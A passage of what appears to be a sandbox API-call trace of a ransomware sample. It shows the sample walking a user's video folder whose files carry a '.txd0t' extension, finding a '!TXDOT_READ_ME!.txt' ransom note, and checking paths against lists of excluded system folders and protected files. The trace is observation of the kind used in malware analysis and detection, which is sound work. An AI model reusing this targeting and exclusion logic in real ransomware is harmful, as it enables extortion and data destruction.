psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0qq-2JELVv.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0qq-2JELVv.avi.txd0t" [0090.325] PathFindExtensionW (pszPath="0qq-2JELVv.avi.txd0t") returned=".txd0t" [0090.325] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.325] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfee27b90, ftCreationTime.dwHighDateTime=0x1d5edca, ftLastAccessTime.dwLowDateTime=0x76781420, ftLastAccessTime.dwHighDateTime=0x1d5ecbe, ftLastWriteTime.dwLowDateTime=0x52f50403, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xddf4, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="fR4 C.mp4.txd0t", cAlternateFileName="FR4CMP~1.TXD")) returned 1 [0090.325] StrCmpW (psz1="fR4 C.mp4.txd0t", psz2=".") returned 1 [0090.325] StrCmpW (psz1="fR4 C.mp4.txd0t", psz2="..") returned 1 [0090.325] StrCpyNW (in: psz1=0xec7f28, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0090.325] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0090.325] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="fR4 C.mp4.txd0t", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\fR4 C.mp4.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\fR4 C.mp4.txd0t" [0090.325] PathFindExtensionW (pszPath="fR4 C.mp4.txd0t") returned=".txd0t" [0090.325] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.325] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7925b570, ftCreationTime.dwHighDateTime=0x1d5ed62, ftLastAccessTime.dwLowDateTime=0x1620ff10, ftLastAccessTime.dwHighDateTime=0x1d5e624, ftLastWriteTime.dwLowDateTime=0x52f7676d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xf41f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="I8mA7.swf.txd0t", cAlternateFileName="I8MA7S~1.TXD")) returned 1 [0090.325] StrCmpW (psz1="I8mA7.swf.txd0t", psz2=".") returned 1 [0090.325] StrCmpW (psz1="I8mA7.swf.txd0t", psz2="..") returned 1 [0090.325] StrCpyNW (in: psz1=0xec7f28, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0090.325] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0090.325] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="I8mA7.swf.txd0t", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\I8mA7.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\I8mA7.swf.txd0t" [0090.325] PathFindExtensionW (pszPath="I8mA7.swf.txd0t") returned=".txd0t" [0090.325] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.325] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bd7c1d0, ftCreationTime.dwHighDateTime=0x1d5e0d3, ftLastAccessTime.dwLowDateTime=0xa1909100, ftLastAccessTime.dwHighDateTime=0x1d5f0c4, ftLastWriteTime.dwLowDateTime=0x52f7676d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x3388, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="iGBmnx.swf.txd0t", cAlternateFileName="IGBMNX~1.TXD")) returned 1 [0090.325] StrCmpW (psz1="iGBmnx.swf.txd0t", psz2=".") returned 1 [0090.325] StrCmpW (psz1="iGBmnx.swf.txd0t", psz2="..") returned 1 [0090.326] StrCpyNW (in: psz1=0xec7f28, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0090.326] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0090.326] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="iGBmnx.swf.txd0t", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\iGBmnx.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\iGBmnx.swf.txd0t" [0090.326] PathFindExtensionW (pszPath="iGBmnx.swf.txd0t") returned=".txd0t" [0090.326] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.326] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b149190, ftCreationTime.dwHighDateTime=0x1d5f129, ftLastAccessTime.dwLowDateTime=0x9bf61aa0, ftLastAccessTime.dwHighDateTime=0x1d5e6f9, ftLastWriteTime.dwLowDateTime=0x52f9c7a7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xbdaf, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="IWWrfzZp12CtwW5GR.mkv.txd0t", cAlternateFileName="IWWRFZ~1.TXD")) returned 1 [0090.326] StrCmpW (psz1="IWWrfzZp12CtwW5GR.mkv.txd0t", psz2=".") returned 1 [0090.326] StrCmpW (psz1="IWWrfzZp12CtwW5GR.mkv.txd0t", psz2="..") returned 1 [0090.326] StrCpyNW (in: psz1=0xec7f28, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0090.326] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0090.326] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="IWWrfzZp12CtwW5GR.mkv.txd0t", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\IWWrfzZp12CtwW5GR.mkv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\IWWrfzZp12CtwW5GR.mkv.txd0t" [0090.326] PathFindExtensionW (pszPath="IWWrfzZp12CtwW5GR.mkv.txd0t") returned=".txd0t" [0090.326] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.326] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6ddc5a0, ftCreationTime.dwHighDateTime=0x1d5e765, ftLastAccessTime.dwLowDateTime=0xeaa5be10, ftLastAccessTime.dwHighDateTime=0x1d5e886, ftLastWriteTime.dwLowDateTime=0x52fc2964, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xf533, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="LISQrmwmwFkmeV9a6dun.mp4.txd0t", cAlternateFileName="LISQRM~1.TXD")) returned 1 [0090.326] StrCmpW (psz1="LISQrmwmwFkmeV9a6dun.mp4.txd0t", psz2=".") returned 1 [0090.326] StrCmpW (psz1="LISQrmwmwFkmeV9a6dun.mp4.txd0t", psz2="..") returned 1 [0090.326] StrCpyNW (in: psz1=0xec7f28, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0090.326] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0090.326] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="LISQrmwmwFkmeV9a6dun.mp4.txd0t", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\LISQrmwmwFkmeV9a6dun.mp4.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\LISQrmwmwFkmeV9a6dun.mp4.txd0t" [0090.326] PathFindExtensionW (pszPath="LISQrmwmwFkmeV9a6dun.mp4.txd0t") returned=".txd0t" [0090.326] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.326] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce00c6e0, ftCreationTime.dwHighDateTime=0x1d5e20c, ftLastAccessTime.dwLowDateTime=0x40bd89b0, ftLastAccessTime.dwHighDateTime=0x1d5ebe1, ftLastWriteTime.dwLowDateTime=0x52fc2964, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xcde3, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="MTVtI3u5U.mkv.txd0t", cAlternateFileName="MTVTI3~1.TXD")) returned 1 [0090.326] StrCmpW (psz1="MTVtI3u5U.mkv.txd0t", psz2=".") returned 1 [0090.326] StrCmpW (psz1="MTVtI3u5U.mkv.txd0t", psz2="..") returned 1 [0090.326] StrCpyNW (in: psz1=0xec7f28, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0090.326] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0090.326] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="MTVtI3u5U.mkv.txd0t", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\MTVtI3u5U.mkv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\MTVtI3u5U.mkv.txd0t" [0090.326] PathFindExtensionW (pszPath="MTVtI3u5U.mkv.txd0t") returned=".txd0t" [0090.326] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.326] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7046e160, ftCreationTime.dwHighDateTime=0x1d5ef3b, ftLastAccessTime.dwLowDateTime=0x9d2b7320, ftLastAccessTime.dwHighDateTime=0x1d5e8b6, ftLastWriteTime.dwLowDateTime=0x52fe8c69, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x37c0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="mZX-jxKKh.mkv.txd0t", cAlternateFileName="MZX-JX~1.TXD")) returned 1 [0090.326] StrCmpW (psz1="mZX-jxKKh.mkv.txd0t", psz2=".") returned 1 [0090.326] StrCmpW (psz1="mZX-jxKKh.mkv.txd0t", psz2="..") returned 1 [0090.326] StrCpyNW (in: psz1=0xec7f28, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0090.327] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0090.327] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="mZX-jxKKh.mkv.txd0t", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\mZX-jxKKh.mkv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\mZX-jxKKh.mkv.txd0t" [0090.327] PathFindExtensionW (pszPath="mZX-jxKKh.mkv.txd0t") returned=".txd0t" [0090.327] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.327] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc450e690, ftCreationTime.dwHighDateTime=0x1d5eb8d, ftLastAccessTime.dwLowDateTime=0x5300ee3c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5300ee3c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Z2p1JCW7G9Pu", cAlternateFileName="Z2P1JC~1")) returned 1 [0090.327] StrCmpW (psz1="Z2p1JCW7G9Pu", psz2=".") returned 1 [0090.327] StrCmpW (psz1="Z2p1JCW7G9Pu", psz2="..") returned 1 [0090.327] StrCpyNW (in: psz1=0xec7f28, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0090.327] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0090.327] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="Z2p1JCW7G9Pu", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu" [0090.327] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\windows\\system32\\") returned 0x0 [0090.327] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.327] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\windows\\system\\") returned 0x0 [0090.327] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.327] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.327] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\appdata\\local\\") returned 0x0 [0090.327] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.327] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.327] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.327] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch=":\\boot\\") returned 0x0 [0090.327] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch=":\\perflogs\\") returned 0x0 [0090.327] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch=":\\programdata\\") returned 0x0 [0090.327] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch=":\\drivers\\") returned 0x0 [0090.327] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch=":\\wsus\\") returned 0x0 [0090.327] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.327] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.327] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="crypt_detect") returned 0x0 [0090.327] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="cryptolocker") returned 0x0 [0090.327] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="ransomware") returned 0x0 [0090.327] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="C:\\WINDOWS") returned 0x0 [0090.328] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.328] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="C:\\Program Files") returned 0x0 [0090.328] GetProcessHeap () returned 0xe30000 [0090.328] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ee) returned 0xecbb70 [0090.328] StrCpyNW (in: psz1=0xecbb70, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu" [0090.328] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", psz2="\\*", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\*") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\*" [0090.328] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\*", lpFindFileData=0x561ea00 | out: lpFindFileData=0x561ea00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc450e690, ftCreationTime.dwHighDateTime=0x1d5eb8d, ftLastAccessTime.dwLowDateTime=0x5300ee3c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5300ee3c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x570ea4, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0090.328] StrCmpW (psz1=".", psz2=".") returned 0 [0090.356] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561ea00 | out: lpFindFileData=0x561ea00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc450e690, ftCreationTime.dwHighDateTime=0x1d5eb8d, ftLastAccessTime.dwLowDateTime=0x5300ee3c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5300ee3c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x570ea4, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.356] StrCmpW (psz1="..", psz2=".") returned 1 [0090.356] StrCmpW (psz1="..", psz2="..") returned 0 [0090.356] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561ea00 | out: lpFindFileData=0x561ea00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52fe8c69, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x52fe8c69, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5300ee3c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x570ea4, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.356] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.356] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.356] StrCpyNW (in: psz1=0xecbb70, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu" [0090.356] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", psz2="\\", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\" [0090.356] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\!TXDOT_READ_ME!.txt" [0090.356] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.356] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.356] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.356] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.356] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.356] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.356] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.356] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.356] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.356] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.356] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.356] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.356] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.356] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.356] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.356] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.356] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561ea00 | out: lpFindFileData=0x561ea00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe193def0, ftCreationTime.dwHighDateTime=0x1d5e3c3, ftLastAccessTime.dwLowDateTime=0xa2d2a3d0, ftLastAccessTime.dwHighDateTime=0x1d5f049, ftLastWriteTime.dwLowDateTime=0x52fe8c69, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1216d, dwReserved0=0x570ea4, dwReserved1=0x0, cFileName="AuNane-wUgoPDM.swf.txd0t", cAlternateFileName="AUNANE~1.TXD")) returned 1 [0090.357] StrCmpW (psz1="AuNane-wUgoPDM.swf.txd0t", psz2=".") returned 1 [0090.357] StrCmpW (psz1="AuNane-wUgoPDM.swf.txd0t", psz2="..") returned 1 [0090.357] StrCpyNW (in: psz1=0xecbb70, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu" [0090.357] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", psz2="\\", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a 